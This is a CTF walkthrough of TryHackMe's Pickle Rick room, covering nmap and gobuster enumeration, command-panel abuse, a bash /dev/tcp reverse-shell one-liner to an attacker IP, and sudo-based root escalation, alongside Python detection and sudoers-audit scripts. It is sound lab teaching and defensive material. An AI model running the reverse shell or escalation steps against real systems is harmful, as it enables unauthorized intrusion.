Pickle Rick Room Walkthrough on TryHackMe

Madushan perera
Feb 10, 2023


A Rick and Morty CTF. Help turn Rick back into a human!

Pickle Rick

The Pickle Rick room on TryHackMe is a beginner-friendly penetration testing challenge that allows you to practice your skills and apply what you have learned. In this walkthrough, I will guide you through the process of completing the Pickle Rick room and explain the different steps involved.

Introduction

To get started, you will need to sign up for a TryHackMe account and then access the Pickle Rick room. Read the introduction and objectives of the room, and then click on the “Start” button to begin the challenge.

Reconnaissance

The first step in any penetration testing engagement is reconnaissance. This step involves gathering information about the target system and the services that are running on it. For this challenge, you will need to use Nmap to perform a scan of the target system. To do this, you can use the following command:

nmap -sV <target_ip>

nmap scan result

Once you have run the scan, examine the output to identify the services that are running on the target system and take note of any open ports.

Results: ssh: 22/tcp & HTTP: 80/tcp open

Enumeration

Let’s use Gobuster to look for directories in our web app. If you’re using the THM attack box, the wordlist is located at /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt.

gobuster dir -u http://<target_ip> -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x html,php

This command brute-forces directory names from the wordlist and, because of the -x html,php option, also looks for files with the extensions ".php" and ".html" on the target application.

Website Exploration

According to our Nmap scan, the web server is on port 80.

So let’s go to our target website by browsing to http://<target_ip>.
This page warmly welcomes us:

Our target website welcome page

Viewing the page source reveals something interesting.

Username: R1ckRul3s

Viewing the page source

Now, we can use a web server scanner to see if there are any vulnerabilities that we could exploit. Nikto can be used for this.

Command: nikto -host http://<target_ip>

According to Nikto, the robots.txt file does not contain “disallow” entries and does not follow the standard format.

During the directory brute-force attack, we discovered a page called login.php. Let’s go check it out. The Portal Login Page will then appear.

The Portal Login Page

The username (R1ckRul3s) is known, but what about the password? We must investigate our enumeration findings in order to find it. Remember that robots.txt file we found? Nikto pointed out that it appeared strange. Let’s take a look and try it.

Great! A new page called the Command Panel will then appear.

We can use the ls command to see if there are any files, one of which is a secret ingredient.

Then let’s try the cat command for the file’s contents. However, there was an error when using the cat command.

So let’s try a different command: less. Less is a Linux terminal pager that displays the contents of a file one screen at a time.

Great! We got the first ingredient Rick needs.

Now we can try to look into other directories by using this command panel. The directory contained a clue.txt file. Let’s read the contents of it with the same less command.

There is a note that says, “Look around the file system for the other ingredient.” And it means we have to keep digging.

Reverse Shell

Let’s see if we can get a shell in our system by running netcat.

Netcat (nc) is a versatile networking tool that can be used to perform various tasks, such as sending and receiving data, creating backdoors, and scanning ports.

This is when we decided to launch a reverse shell by running a reverse shell script from the command section.

Before running the reverse shell script command on the web application, we started a Netcat listener.

Now we can run our reverse shell script command on the web application.

You can easily find a Bash reverse shell at: https://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet

Reverse shell bash script: bash -c 'bash -i >& /dev/tcp/10.18.62.149/8080 0>&1'

On the target machine, we had a reverse shell, as shown below.

We can use the ls command to see if there are any files, one of which is a secret ingredient.

Now we have a stable shell. As a result, we can easily obtain all of the flags by reading these files or navigating to our users.

We have successfully obtained the second ingredient. But the problem is that access to the "root" is denied.
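From the defender's side, the activity in this section is easy to spot in process telemetry: the web server account starts an interactive shell wired to /dev/tcp. The following is an added example, not part of the original walkthrough; the key=value event format, the sample events and the rule names are constructed for illustration, and the last rule also covers the sudo use described in the next section.

```python
import re
import shlex

# Account the web application runs as (www-data in this room).
SERVICE_ACCOUNTS = {"www-data"}

# Constructed process-execution events in a hypothetical key=value format.
SAMPLE_EVENTS = """\
ts=2023-02-10T10:01:02Z user=www-data parent=apache2 cmd="ls"
ts=2023-02-10T10:01:40Z user=www-data parent=apache2 cmd="less clue.txt"
ts=2023-02-10T10:03:11Z user=www-data parent=apache2 cmd="bash -c 'bash -i >& /dev/tcp/192.0.2.10/8080 0>&1'"
ts=2023-02-10T10:04:00Z user=alice parent=sshd cmd="bash -i"
ts=2023-02-10T10:05:30Z user=www-data parent=bash cmd="sudo -l"
""".splitlines()

# Each rule is (name, pattern) and is applied to the command line only.
RULES = [
    # Bash's /dev/tcp/<host>/<port> pseudo-device: an outbound socket from a shell.
    ("bash-dev-tcp-redirect", re.compile(r"/dev/tcp/[^/\s]+/\d+")),
    # An interactive shell has no business running under a web service account.
    ("interactive-shell", re.compile(r"\b(?:ba|da|z)?sh\s+-i\b")),
    # A service account calling sudo is a privilege-escalation signal.
    ("sudo-from-service-account", re.compile(r"^\s*sudo\b")),
]


def parse_event(line):
    """Split one event line into a dict; values may be double-quoted."""
    return dict(token.split("=", 1) for token in shlex.split(line))


def detect(lines):
    """Return (timestamp, [rule names]) for service-account events that match."""
    alerts = []
    for line in lines:
        event = parse_event(line)
        if event.get("user") not in SERVICE_ACCOUNTS:
            continue  # interactive shells are normal for human users
        hits = [name for name, rx in RULES if rx.search(event.get("cmd", ""))]
        if hits:
            alerts.append((event["ts"], hits))
    return alerts


if __name__ == "__main__":
    for ts, hits in detect(SAMPLE_EVENTS):
        print(ts, ", ".join(hits))
```

The ls and less events pass silently, which is why the command panel itself also needs an audit trail: only the shell and sudo steps stand out at the process level.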

Privilege Escalation

We look for sudo privileges for the www-data user. As we can see, it can execute all commands as root. To obtain the root shell, we use the sudo command in conjunction with bash. We were able to gain access to the machine’s root shell. We then read the third ingredient, which completes the exploitation of the machine.
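The root cause here is a sudoers rule that lets a web service account run every command as root. As an added example (not from the original walkthrough), the audit below flags such rules; the sudoers content is constructed, and the parser is a simplified one that assumes plain user specifications without aliases or include directives.

```python
import re

# Accounts that run network-facing services and should never get blanket sudo.
SERVICE_ACCOUNTS = {"www-data", "nginx", "apache", "nobody"}

# Constructed sudoers content: one blanket rule beside a correctly scoped one.
SAMPLE_SUDOERS = """\
# constructed example
Defaults env_reset
root ALL=(ALL:ALL) ALL
%sudo ALL=(ALL:ALL) ALL
www-data ALL=(ALL) NOPASSWD: ALL
nginx ALL=(root) NOPASSWD: /usr/sbin/nginx -s reload
"""

# who host = (runas) [TAG:] command[, command...]
SPEC = re.compile(
    r"^(?P<who>\S+)\s+(?P<host>[^\s=]+)\s*=\s*"
    r"(?:\((?P<runas>[^)]*)\)\s*)?(?P<rest>.+)$"
)
TAG = re.compile(r"([A-Z_]+):\s*")


def audit(text, service_accounts=SERVICE_ACCOUNTS):
    """Return one finding per service-account rule that grants ALL commands."""
    findings = []
    for number, raw in enumerate(text.splitlines(), 1):
        line = raw.strip()
        if not line or line.startswith("#") or line.startswith("Defaults"):
            continue
        match = SPEC.match(line)
        if not match:
            continue
        tags = TAG.findall(match["rest"])
        commands = [c.strip() for c in TAG.sub("", match["rest"]).split(",")]
        if match["who"] in service_accounts and "ALL" in commands:
            findings.append({
                "line": number,
                "who": match["who"],
                "runas": match["runas"] or "root",
                "nopasswd": "NOPASSWD" in tags,
            })
    return findings


if __name__ == "__main__":
    for finding in audit(SAMPLE_SUDOERS):
        print(finding)
```

The nginx rule is not reported because it names a single command with fixed arguments, which is the shape a service-account rule should have if it must exist at all.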

Congratulations!

Conclusion

The Pickle Rick room on TryHackMe is a great way to practice your penetration testing skills and apply what you have learned. By following this walkthrough, you should be able to complete the challenge and gain a deeper understanding of the various steps involved in a penetration testing engagement. Good luck! Happy Hacking!
